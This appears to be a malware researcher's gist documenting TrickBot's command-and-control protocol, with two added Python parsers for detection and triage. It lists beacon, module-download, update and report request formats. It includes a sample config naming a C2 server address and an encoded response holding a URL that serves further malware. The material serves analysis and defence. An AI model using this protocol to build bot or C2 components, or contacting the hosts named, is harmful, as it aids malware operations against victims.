Gist: hasherezade/88837ea728d3950c7c38160d016ea6cf
TrickBot protocol (work in progress)
Full list of implemented commands: 0, 1, 5, 10, 14, 23, 25, 63
===========
Command: 0
===========
Meaning: Beacon
Req:
/[group_id]/[client_id]/0/[windows version]/[system language id]/[ip]/[sha256 uppercase string]/[session key]/
Possible responses after beacon:
Resp 1:
possibly with additional configuration
----
/1/[group_id]/[client_id]/[session key]/288/
[encrypted]
123456789
encrypted - example:
<servconf>
<expir>1480550400</expir>
<plugins>
<psrv>80.79.114.179:443</psrv>
</plugins>
</servconf>
----
Resp 2 (42):
Meaning - download a new, independent malware
/42/[group_id]/[client_id]/[session key]/35265/
[base64data]
123456789
example:
base64data:
AAAAABITWmON7YmzLzAoFn2jj0looA8XxcYfqQte5O1dab8lJgAAAGgAdAB0AHAA OgAvAC8AMQA1ADYAMQA2AC4AbQBlAHIAYQBoAG8AcwB0AC4AcgB1AC8AOAA1ADEA MwAyADEAMwA2ADUALgBiAGkAbgCT/OBixlv7jD/hi/8w9D3I9LCYf93qh72eEiPo vmcQCB8uL8nz4b9Oqja3omAflv5xR8TDnus4djX37duvEaMHhmxqIlrDcG5DtlIp FG9IsZSitDDFhRsGsQuoI9Vtwls=
decoded:
00000000 00 00 00 00 - (padding?) |....|
12 13 5a 63 8d ed 89 b3 2f 30 28 16 | ..Zc..../0(.|
00000010 7d a3 8f 49 68 a0 0f 17 c5 c6 1f a9 0b 5e e4 ed |}..Ih........^..|
00000020 5d 69 bf 25 - sha256 |]i.%|
26 00 00 00 - URL length | &...|
68 00 74 00 74 00 70 00 | h.t.t.p.|
00000030 3a 00 2f 00 2f 00 31 00 35 00 36 00 31 00 36 00 |:././.1.5.6.1.6.|
00000040 2e 00 6d 00 65 00 72 00 61 00 68 00 6f 00 73 00 |..m.e.r.a.h.o.s.|
00000050 74 00 2e 00 72 00 75 00 2f 00 38 00 35 00 31 00 |t...r.u./.8.5.1.|
00000060 33 00 32 00 31 00 33 00 36 00 35 00 2e 00 62 00 |3.2.1.3.6.5...b.|
00000070 69 00 6e 00 - URL |i.n.|
93 fc e0 62 c6 5b fb 8c 3f e1 8b ff | ...b.[..?...|
00000080 30 f4 3d c8 f4 b0 98 7f dd ea 87 bd 9e 12 23 e8 |0.=...........#.|
00000090 be 67 10 08 1f 2e 2f c9 f3 e1 bf 4e aa 36 b7 a2 |.g..../....N.6..|
000000a0 60 1f 96 fe 71 47 c4 c3 9e eb 38 76 35 f7 ed db |`...qG....8v5...|
000000b0 af 11 a3 07 86 6c 6a 22 5a c3 70 6e 43 b6 52 29 |.....lj"Z.pnC.R)|
000000c0 14 6f 48 b1 94 a2 b4 30 c5 85 1b 06 b1 0b a8 23 |.oH....0.......#|
000000d0 d5 6d c2 5b - signature |.m.[|
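The decoded layout above, as a parser added here (not code from the gist's author): it takes the base64 body quoted above and splits it into the annotated fields. The field widths are assumed fixed from this one sample; the 32 bytes the dump labels sha256 and the trailing bytes it labels signature are only sliced out, since what they cover is not stated.

```python
import base64
import struct

# Base64 body quoted in the gist for the command-42 response (page data, spaces removed).
SAMPLE_B64 = (
    "AAAAABITWmON7YmzLzAoFn2jj0looA8XxcYfqQte5O1dab8lJgAAAGgAdAB0AHAA"
    "OgAvAC8AMQA1ADYAMQA2AC4AbQBlAHIAYQBoAG8AcwB0AC4AcgB1AC8AOAA1ADEA"
    "MwAyADEAMwA2ADUALgBiAGkAbgCT/OBixlv7jD/hi/8w9D3I9LCYf93qh72eEiPo"
    "vmcQCB8uL8nz4b9Oqja3omAflv5xR8TDnus4djX37duvEaMHhmxqIlrDcG5DtlIp"
    "FG9IsZSitDDFhRsGsQuoI9Vtwls="
)


def parse_cmd42_body(b64_text: str) -> dict:
    """Split a decoded command-42 body into the fields annotated in the dump.

    Layout (assumed fixed-width, taken from the single sample above):
      4 bytes    padding (all zero in the sample)
      32 bytes   labelled 'sha256' in the dump; what it hashes is not stated
      4 bytes    URL length, little-endian, counted in UTF-16 characters
      2 * len    URL as UTF-16LE
      remainder  labelled 'signature' in the dump (96 bytes in the sample)
    Nothing is verified here; the hash and signature are returned as-is.
    """
    raw = base64.b64decode("".join(b64_text.split()))
    if len(raw) < 40:
        raise ValueError("body too short for padding + hash + length field")
    padding = raw[:4]
    digest = raw[4:36]
    (url_chars,) = struct.unpack_from("<I", raw, 36)
    url_end = 40 + 2 * url_chars
    if url_end > len(raw):
        raise ValueError("URL length field exceeds body size")
    url = raw[40:url_end].decode("utf-16-le")
    signature = raw[url_end:]
    return {
        "padding": padding,
        "hash_hex": digest.hex(),
        "url": url,
        "signature_len": len(signature),
        "total_len": len(raw),
    }
```

Running it on the sample yields the URL the dump spells out in UTF-16LE, which is the indicator an analyst would extract from this response.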
===========
Command: 1
===========
Meaning: Keep alive
Req:
/[group_id]/[client_id]/1/[session key]/
Resp:
/1/
===========
Command: 5
===========
Meaning: Download module/module config
Req:
/[group_id]/[client_id]/5/[module/config name]/
Examples:
/[group_id]/[client_id]/5/spk/
/[group_id]/[client_id]/5/dinj/
/[group_id]/[client_id]/5/sinj/
/[group_id]/[client_id]/5/dpost/
/[group_id]/[client_id]/5/systeminfo32/
/[group_id]/[client_id]/5/injectDll32/
Resp:
[AES encrypted data - requested module]
===========
Command: 10
===========
Meaning: start module info?
Req:
/[group_id]/[client_id]/10/62/[session key]/1/
* Example:
/[group_id]/[client_id]/10/62/HIZQJUXGMUJXATGQT/1/
Resp: [None]
===========
Command: 14
===========
Meaning: Additional info/checks
Req:
/[group_id]/[client_id]/14/[key]/[value]/0/
* Examples:
user info:
/[group_id]/[client_id]/14/user/[username]/0/
is DNS blacklisted?
/[group_id]/[client_id]/14/DNSBL/listed/0/
/[group_id]/[client_id]/14/DNSBL/not%20listed/0/
Resp:
[None]
===========
Command: 23
===========
Meaning: Compare my config version with the current version
Req:
/[group_id]/[client_id]/23/[config ver]/
* Example:
/[group_id]/[client_id]/23/1000002/
Resp:
- if update available:
/23/[group_id]/[client_id]/1000003/704/
[encrypted]
1234567890
encrypted:
updated config content
- if no update:
[None]
===========
Command: 25
===========
Meaning: Check bot update
Req:
/[group_id]/[client_id]/25/[session key]/
Resp:
- if update available:
/25/[group_id]/[client_id]/[session key]/
[link to the updated bot]
123456789
[Bot updates itself, downloading a new version from the given url...]
- if no update:
[None]
===========
Command: 63
===========
Meaning: Module report
Req:
/[group_id]/[client_id]/63/[module name]/[module command]/[result - base64]/[root tag of output XML]/
* Example:
/[group_id]/[client_id]/63/systeminfo/start/(null)//
* Example:
/[group_id]/[client_id]/63/systeminfo/GetSystemInfo/c3VjY2Vzcw==/systeminfo/
c3VjY2Vzcw== -> Base64("success")
Content-Type: multipart/form-data; boundary=------Boundary[random id]
[posting list of running processes and installed programs:]
--------Boundary[random id]
Content-Disposition: form-data; name="noname"
<systeminfo>[...]</systeminfo>
--------Boundary[random id]--
* Example:
/[group_id]/[client_id]/63/injectDll/start/U3VjY2Vzcw==//
U3VjY2Vzcw== -> Base64("Success")
Resp:
[None]
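Added example, not from the original gist: a classifier for the request shapes listed above, meant to be run over proxy or web-server log paths to flag requests of this format and pull out the documented fields for triage. The group and client ids in the constructed sample paths are placeholders.

```python
import base64
import binascii
from typing import Optional
from urllib.parse import unquote

# Command numbers and meanings as listed in the gist.
COMMANDS = {0: "Beacon", 1: "Keep alive", 5: "Download module/module config",
            10: "start module info?", 14: "Additional info/checks",
            23: "Compare config version", 25: "Check bot update",
            63: "Module report"}

# Constructed log paths (placeholder ids); the last one is ordinary web traffic.
SAMPLE_PATHS = [
    "/grp01/CLIENT01/14/DNSBL/not%20listed/0/",
    "/grp01/CLIENT01/63/systeminfo/GetSystemInfo/c3VjY2Vzcw==/systeminfo/",
    "/grp01/CLIENT01/63/systeminfo/start/(null)//",
    "/static/img/logo.png",
]


def _b64_text(field: str) -> str:
    """Decode a base64 result field; the 'start' report carries '(null)' there,
    so anything that is not valid base64 is returned unchanged."""
    try:
        return base64.b64decode(field, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return field


def parse_request_path(path: str) -> Optional[dict]:
    """Match /[group_id]/[client_id]/[command]/.../ and extract the documented
    fields. Returns None for paths that do not fit, so ordinary log entries
    are not flagged."""
    parts = path.split("/")
    if len(parts) < 5 or parts[0] != "" or parts[-1] != "":
        return None
    segs = parts[1:-1]
    if not segs[2].isdigit() or int(segs[2]) not in COMMANDS:
        return None
    cmd = int(segs[2])
    info = {"group_id": segs[0], "client_id": segs[1], "cmd": cmd,
            "meaning": COMMANDS[cmd], "args": segs[3:]}
    if cmd == 0 and len(segs) >= 8:   # beacon: win ver, lang id, ip, sha256, key
        info.update(win_ver=segs[3], lang_id=segs[4], ip=segs[5],
                    sha256=segs[6], session_key=segs[7])
    elif cmd == 14 and len(segs) >= 5:  # key/value check, value is URL-encoded
        info.update(key=segs[3], value=unquote(segs[4]))
    elif cmd == 63 and len(segs) >= 7:  # module report with base64 result
        info.update(module=segs[3], module_cmd=segs[4],
                    result=_b64_text(segs[5]), root_tag=segs[6])
    return info
```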